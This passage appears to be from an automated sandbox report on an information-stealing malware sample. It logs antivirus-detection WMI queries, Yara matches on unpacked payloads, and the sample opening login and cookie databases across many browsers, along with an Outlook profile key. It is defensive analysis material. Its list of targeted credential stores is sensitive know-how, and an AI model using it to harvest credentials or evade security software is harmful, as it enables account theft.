Source: Amcache.hve.9.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601666880.000001ABBC4D1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602672974.000001ABBBDAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002E.00000002.3602844676.000000800E378000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ndows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000002.3603092587.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602735400.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: rundll32.exe Binary or memory string: 360tray.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002E.00000003.3602239295.000001ABBC4B1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602219141.000001ABBC4B0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602672974.000001ABBBDAE000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601495070.000001ABBBD86000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000002.3603064300.000001ABBBD89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBD87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: Amcache.hve.9.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 3.2.rundll32.exe.14614300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.146142f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.146142f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.14614300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 180, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Source: Yara match File source: 3.2.rundll32.exe.14614300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.146142f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.146142f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.14614300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.237c16c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 180, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR